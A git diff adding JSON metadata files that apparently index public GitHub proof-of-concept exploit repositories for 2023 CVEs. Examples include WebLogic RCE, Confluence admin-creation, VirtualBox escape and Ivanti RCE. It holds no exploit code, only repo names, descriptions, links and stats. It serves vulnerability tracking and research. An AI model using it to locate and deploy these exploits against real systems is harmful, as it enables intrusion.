"topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 783126137, + "name": "CVE-2023-21768", + "full_name": "ldrx30\/CVE-2023-21768", + "owner": { + "login": "ldrx30", + "id": 102413682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102413682?v=4", + "html_url": "https:\/\/github.com\/ldrx30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ldrx30\/CVE-2023-21768", + "description": "CVE-2023-21768 Proof of Concept", + "fork": false, + "created_at": "2024-04-07T02:26:36Z", + "updated_at": "2024-04-07T02:53:21Z", + "pushed_at": "2024-04-07T02:53:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801154640, + "name": "CVE-2023-21768-dotnet", + "full_name": "xboxoneresearch\/CVE-2023-21768-dotnet", + "owner": { + "login": "xboxoneresearch", + "id": 43215579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43215579?v=4", + "html_url": "https:\/\/github.com\/xboxoneresearch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xboxoneresearch\/CVE-2023-21768-dotnet", + "description": "C# \/ .NET version of CVE-2023-21768", + "fork": false, + "created_at": "2024-05-15T17:42:10Z", + "updated_at": "2024-11-16T11:28:09Z", + "pushed_at": "2024-09-06T18:19:31Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21823.json b/2023/CVE-2023-21823.json new file mode 100644 index 0000000000..8ec7c14d96 --- /dev/null +++ b/2023/CVE-2023-21823.json @@ -0,0 +1,33 @@ +[ + { + "id": 630435422, + "name": "CVE-2023-21823", + "full_name": "Elizarfish\/CVE-2023-21823", + "owner": { + "login": "Elizarfish", + "id": 47054974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47054974?v=4", + "html_url": "https:\/\/github.com\/Elizarfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elizarfish\/CVE-2023-21823", + "description": " CVE-2023-21823 PoC", + "fork": false, + "created_at": "2023-04-20T11:26:48Z", + "updated_at": "2024-09-12T06:26:36Z", + "pushed_at": "2023-04-20T11:36:55Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21837.json b/2023/CVE-2023-21837.json new file mode 100644 index 0000000000..eaf7b70964 --- /dev/null +++ b/2023/CVE-2023-21837.json @@ -0,0 +1,33 @@ +[ + { + "id": 624692890, + "name": "CVE-2023-21837", + "full_name": "hktalent\/CVE-2023-21837", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2023-21837", + "description": "POC,EXP, chatGPT for me", + "fork": false, + "created_at": "2023-04-07T03:18:12Z", + "updated_at": "2023-04-07T03:19:16Z", + "pushed_at": "2023-04-07T03:18:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21839.json b/2023/CVE-2023-21839.json new file mode 100644 index 0000000000..0155950109 --- /dev/null +++ b/2023/CVE-2023-21839.json @@ -0,0 +1,223 @@ +[ + { + "id": 604704774, + "name": "Weblogic-CVE-2023-21839", + "full_name": "DXask88MA\/Weblogic-CVE-2023-21839", + "owner": { + "login": "DXask88MA", + "id": 53396671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53396671?v=4", + "html_url": "https:\/\/github.com\/DXask88MA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXask88MA\/Weblogic-CVE-2023-21839", + "description": null, + "fork": false, + "created_at": "2023-02-21T16:08:56Z", + "updated_at": "2024-11-28T08:01:48Z", + "pushed_at": "2023-02-26T06:43:18Z", + "stargazers_count": 228, + "watchers_count": 228, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 228, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 606055426, + "name": "CVE-2023-21839", + "full_name": "ASkyeye\/CVE-2023-21839", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2023-21839", + "description": "Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)", + "fork": false, + "created_at": "2023-02-24T13:54:42Z", + "updated_at": "2024-11-28T15:29:10Z", + "pushed_at": "2023-02-24T13:29:38Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 108, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 108, + "watchers": 57, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612534596, + "name": "CVE-2023-21839", + "full_name": "Firebasky\/CVE-2023-21839", + "owner": { + "login": "Firebasky", + "id": 63966847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63966847?v=4", + "html_url": "https:\/\/github.com\/Firebasky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Firebasky\/CVE-2023-21839", + "description": "CVE-2023-21839工具", + "fork": false, + "created_at": "2023-03-11T08:26:30Z", + "updated_at": "2024-11-17T04:03:10Z", + "pushed_at": "2023-03-11T08:28:28Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 628215658, + "name": "POC_CVE-2023-21839", + "full_name": "houqe\/POC_CVE-2023-21839", + "owner": { + "login": "houqe", + "id": 44364208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44364208?v=4", + "html_url": "https:\/\/github.com\/houqe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/houqe\/POC_CVE-2023-21839", + "description": "CVE-2023-21839 Python版本", + "fork": false, + "created_at": "2023-04-15T08:57:10Z", + "updated_at": "2024-11-08T00:50:08Z", + "pushed_at": "2023-04-21T07:53:54Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646638117, + "name": "CVE-2023-21839-metasploit-scanner", + "full_name": "kw3h4\/CVE-2023-21839-metasploit-scanner", + "owner": { + "login": "kw3h4", + "id": 39688302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39688302?v=4", + "html_url": "https:\/\/github.com\/kw3h4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kw3h4\/CVE-2023-21839-metasploit-scanner", + "description": null, + "fork": false, + "created_at": "2023-05-29T02:08:37Z", + "updated_at": "2023-05-30T08:43:02Z", + "pushed_at": "2023-06-05T06:26:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 726816567, + "name": "Gui-poc-test", + "full_name": "Romanc9\/Gui-poc-test", + "owner": { + "login": "Romanc9", + "id": 55196564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55196564?v=4", + "html_url": "https:\/\/github.com\/Romanc9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Romanc9\/Gui-poc-test", + "description": "A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432", + "fork": false, + "created_at": "2023-12-03T13:45:34Z", + "updated_at": "2024-09-01T03:50:31Z", + "pushed_at": "2023-12-05T17:58:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-39197", + "cve-2023-21839", + "cve-2023-28432" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753664721, + "name": "CVE-2024-20931", + "full_name": "dinosn\/CVE-2024-20931", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2024-20931", + "description": "CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839", + "fork": false, + "created_at": "2024-02-06T15:09:33Z", + "updated_at": "2024-11-02T04:11:58Z", + "pushed_at": "2024-02-06T15:56:12Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21887.json b/2023/CVE-2023-21887.json new file mode 100644 index 0000000000..8e5ca3a466 --- /dev/null +++ b/2023/CVE-2023-21887.json @@ -0,0 +1,33 @@ +[ + { + "id": 745522429, + "name": "CVE-2023-21887", + "full_name": "zwxxb\/CVE-2023-21887", + "owner": { + "login": "zwxxb", + "id": 68430832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430832?v=4", + "html_url": "https:\/\/github.com\/zwxxb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwxxb\/CVE-2023-21887", + "description": "Remote Code Execution : Ivanti ", + "fork": false, + "created_at": "2024-01-19T14:17:49Z", + "updated_at": "2024-03-08T15:05:53Z", + "pushed_at": "2024-01-19T15:30:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21931.json b/2023/CVE-2023-21931.json new file mode 100644 index 0000000000..fec6d6ad6e --- /dev/null +++ b/2023/CVE-2023-21931.json @@ -0,0 +1,33 @@ +[ + { + "id": 709326797, + "name": "weblogic_CVE-2023-21931_POC-EXP", + "full_name": "TimeSHU\/weblogic_CVE-2023-21931_POC-EXP", + "owner": { + "login": "TimeSHU", + "id": 38472514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38472514?v=4", + "html_url": "https:\/\/github.com\/TimeSHU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TimeSHU\/weblogic_CVE-2023-21931_POC-EXP", + "description": null, + "fork": false, + "created_at": "2023-10-24T13:49:15Z", + "updated_at": "2023-10-24T13:49:15Z", + "pushed_at": "2023-10-21T14:14:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21939.json b/2023/CVE-2023-21939.json new file mode 100644 index 0000000000..e5624b66eb --- /dev/null +++ b/2023/CVE-2023-21939.json @@ -0,0 +1,33 @@ +[ + { + "id": 683311147, + "name": "CVE-2023-21939", + "full_name": "Y4Sec-Team\/CVE-2023-21939", + "owner": { + "login": "Y4Sec-Team", + "id": 141109859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141109859?v=4", + "html_url": "https:\/\/github.com\/Y4Sec-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4Sec-Team\/CVE-2023-21939", + "description": "JDK CVE-2023-21939", + "fork": false, + "created_at": "2023-08-26T06:45:26Z", + "updated_at": "2024-10-24T02:44:54Z", + "pushed_at": "2023-08-26T06:57:55Z", + "stargazers_count": 96, + "watchers_count": 96, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 96, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21971.json b/2023/CVE-2023-21971.json new file mode 100644 index 0000000000..5e97d3a4b2 --- /dev/null +++ b/2023/CVE-2023-21971.json @@ -0,0 +1,33 @@ +[ + { + "id": 650887863, + "name": "CVE-2023-21971_Analysis", + "full_name": "Avento\/CVE-2023-21971_Analysis", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-21971_Analysis", + "description": "CVE-2023-21971 Connector\/J RCE Analysis分析", + "fork": false, + "created_at": "2023-06-08T03:05:54Z", + "updated_at": "2023-10-19T08:06:25Z", + "pushed_at": "2023-06-08T03:06:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21987.json b/2023/CVE-2023-21987.json new file mode 100644 index 0000000000..2daf2504f9 --- /dev/null +++ b/2023/CVE-2023-21987.json @@ -0,0 +1,33 @@ +[ + { + "id": 862382230, + "name": "cve-2023-21987-poc", + "full_name": "chunzhennn\/cve-2023-21987-poc", + "owner": { + "login": "chunzhennn", + "id": 38834411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38834411?v=4", + "html_url": "https:\/\/github.com\/chunzhennn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chunzhennn\/cve-2023-21987-poc", + "description": "Oracle VirtualBox VGA OOB-Read Vulnerability", + "fork": false, + "created_at": "2024-09-24T14:01:57Z", + "updated_at": "2024-10-21T18:15:25Z", + "pushed_at": "2024-10-21T18:15:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22074.json b/2023/CVE-2023-22074.json new file mode 100644 index 0000000000..1052bed05d --- /dev/null +++ b/2023/CVE-2023-22074.json @@ -0,0 +1,33 @@ +[ + { + "id": 709883034, + "name": "CVE-2023-22074", + "full_name": "emad-almousa\/CVE-2023-22074", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2023-22074", + "description": "CVE-2023-22074", + "fork": false, + "created_at": "2023-10-25T15:26:17Z", + "updated_at": "2023-10-25T15:26:17Z", + "pushed_at": "2023-10-25T15:27:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22098.json b/2023/CVE-2023-22098.json new file mode 100644 index 0000000000..6aa19ea5f6 --- /dev/null +++ b/2023/CVE-2023-22098.json @@ -0,0 +1,33 @@ +[ + { + "id": 870976805, + "name": "CVE-2023-22098", + "full_name": "Diego-AltF4\/CVE-2023-22098", + "owner": { + "login": "Diego-AltF4", + "id": 55554183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55554183?v=4", + "html_url": "https:\/\/github.com\/Diego-AltF4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diego-AltF4\/CVE-2023-22098", + "description": "Oracle VM VirtualBox 7.0.10 r158379 Escape", + "fork": false, + "created_at": "2024-10-11T02:53:14Z", + "updated_at": "2024-10-24T14:57:22Z", + "pushed_at": "2024-10-23T18:01:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2215.json b/2023/CVE-2023-2215.json new file mode 100644 index 0000000000..9b0072901b --- /dev/null +++ b/2023/CVE-2023-2215.json @@ -0,0 +1,33 @@ +[ + { + "id": 703479135, + "name": "CVE-2023-2215", + "full_name": "zwxxb\/CVE-2023-2215", + "owner": { + "login": "zwxxb", + "id": 68430832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430832?v=4", + "html_url": "https:\/\/github.com\/zwxxb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwxxb\/CVE-2023-2215", + "description": "PoC For CVE-2023-2215 - Auth bypass ", + "fork": false, + "created_at": "2023-10-11T10:16:39Z", + "updated_at": "2023-10-12T11:03:42Z", + "pushed_at": "2023-10-12T14:08:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22432.json b/2023/CVE-2023-22432.json new file mode 100644 index 0000000000..d2d8a431e5 --- /dev/null +++ b/2023/CVE-2023-22432.json @@ -0,0 +1,33 @@ +[ + { + "id": 610098108, + "name": "CVE-2023-22432", + "full_name": "aeyesec\/CVE-2023-22432", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2023-22432", + "description": "PoC for CVE-2023-22432 (web2py)", + "fork": false, + "created_at": "2023-03-06T04:43:11Z", + "updated_at": "2023-06-29T15:41:43Z", + "pushed_at": "2023-03-10T07:34:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2249.json b/2023/CVE-2023-2249.json new file mode 100644 index 0000000000..a86a7a876b --- /dev/null +++ b/2023/CVE-2023-2249.json @@ -0,0 +1,41 @@ +[ + { + "id": 653268342, + "name": "CVE-2023-2249", + "full_name": "ixiacom\/CVE-2023-2249", + "owner": { + "login": "ixiacom", + "id": 17768184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17768184?v=4", + "html_url": "https:\/\/github.com\/ixiacom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ixiacom\/CVE-2023-2249", + "description": "Exploit for CVE-2023-2249 in wpForo Forum plugin for WordPress", + "fork": false, + "created_at": "2023-06-13T18:13:27Z", + "updated_at": "2024-11-05T06:59:31Z", + "pushed_at": "2023-07-05T14:11:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2249", + "exploit", + "php", + "proof-of-concept", + "vulnerability", + "wordpress-plugin", + "wpforo" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22490.json b/2023/CVE-2023-22490.json new file mode 100644 index 0000000000..300c8921a0 --- /dev/null +++ b/2023/CVE-2023-22490.json @@ -0,0 +1,33 @@ +[ + { + "id": 608257297, + "name": "CVE-2023-22490_PoC", + "full_name": "smash8tap\/CVE-2023-22490_PoC", + "owner": { + "login": "smash8tap", + "id": 67650789, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67650789?v=4", + "html_url": "https:\/\/github.com\/smash8tap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smash8tap\/CVE-2023-22490_PoC", + "description": null, + "fork": false, + "created_at": "2023-03-01T16:37:39Z", + "updated_at": "2023-03-01T16:38:03Z", + "pushed_at": "2023-03-01T17:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22515.json b/2023/CVE-2023-22515.json new file mode 100644 index 0000000000..61d4a9cec5 --- /dev/null +++ b/2023/CVE-2023-22515.json @@ -0,0 +1,818 @@ +[ + { + "id": 701522727, + "name": "CVE-2023-22515-Scan", + "full_name": "ErikWynter\/CVE-2023-22515-Scan", + "owner": { + "login": "ErikWynter", + "id": 55885619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55885619?v=4", + "html_url": "https:\/\/github.com\/ErikWynter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ErikWynter\/CVE-2023-22515-Scan", + "description": "Scanner for CVE-2023-22515 - Broken Access Control Vulnerability in Atlassian Confluence", + "fork": false, + "created_at": "2023-10-06T20:29:44Z", + "updated_at": "2024-10-21T10:39:01Z", + "pushed_at": "2023-10-06T21:59:30Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 75, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703182036, + "name": "CVE-2023-22515-POC", + "full_name": "j3seer\/CVE-2023-22515-POC", + "owner": { + "login": "j3seer", + "id": 58823465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58823465?v=4", + "html_url": "https:\/\/github.com\/j3seer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3seer\/CVE-2023-22515-POC", + "description": "Poc for CVE-2023-22515", + "fork": false, + "created_at": "2023-10-10T18:45:10Z", + "updated_at": "2023-11-18T17:19:24Z", + "pushed_at": "2023-10-10T19:59:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703240587, + "name": "CVE-2023-22515", + "full_name": "Chocapikk\/CVE-2023-22515", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-22515", + "description": "CVE-2023-22515: Confluence Broken Access Control Exploit", + "fork": false, + "created_at": "2023-10-10T21:40:09Z", + "updated_at": "2024-11-06T23:54:09Z", + "pushed_at": "2023-10-17T22:04:13Z", + "stargazers_count": 129, + "watchers_count": 129, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "broken-access-control", + "confluence", + "cve-2023-22515", + "exploit", + "infosec", + "privilege-escalation", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 29, + "watchers": 129, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 703437161, + "name": "CVE-2023-22515", + "full_name": "ad-calcium\/CVE-2023-22515", + "owner": { + "login": "ad-calcium", + "id": 33044636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33044636?v=4", + "html_url": "https:\/\/github.com\/ad-calcium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ad-calcium\/CVE-2023-22515", + "description": "Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具", + "fork": false, + "created_at": "2023-10-11T08:42:17Z", + "updated_at": "2024-11-16T19:50:13Z", + "pushed_at": "2023-10-16T02:24:02Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 108, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 703506378, + "name": "CVE-2023-22515", + "full_name": "kh4sh3i\/CVE-2023-22515", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2023-22515", + "description": "CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server", + "fork": false, + "created_at": "2023-10-11T11:21:47Z", + "updated_at": "2024-05-26T08:27:32Z", + "pushed_at": "2024-05-26T08:27:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "confluence", + "confluent-platform", + "cve", + "exploit", + "exploitation", + "jira", + "rce", + "scanner", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 703835604, + "name": "CVE-2023-22515", + "full_name": "sincere9\/CVE-2023-22515", + "owner": { + "login": "sincere9", + "id": 128219249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128219249?v=4", + "html_url": "https:\/\/github.com\/sincere9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sincere9\/CVE-2023-22515", + "description": "Confluence未授权添加管理员用户漏洞利用脚本", + "fork": false, + "created_at": "2023-10-12T02:41:23Z", + "updated_at": "2024-11-10T12:36:03Z", + "pushed_at": "2023-10-26T07:39:57Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704360942, + "name": "CVE-2023-22515", + "full_name": "Le1a\/CVE-2023-22515", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-22515", + "description": "Confluence Data Center & Server 权限提升漏洞 Exploit", + "fork": false, + "created_at": "2023-10-13T05:18:54Z", + "updated_at": "2023-10-16T05:58:42Z", + "pushed_at": "2023-10-13T05:21:37Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704422927, + "name": "confluence-cve-2023-22515", + "full_name": "Vulnmachines\/confluence-cve-2023-22515", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/confluence-cve-2023-22515", + "description": "Confluence Broken Access Control", + "fork": false, + "created_at": "2023-10-13T08:19:07Z", + "updated_at": "2023-10-14T09:17:41Z", + "pushed_at": "2023-10-13T08:23:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704429158, + "name": "CVE-2023-22515", + "full_name": "iveresk\/CVE-2023-22515", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + 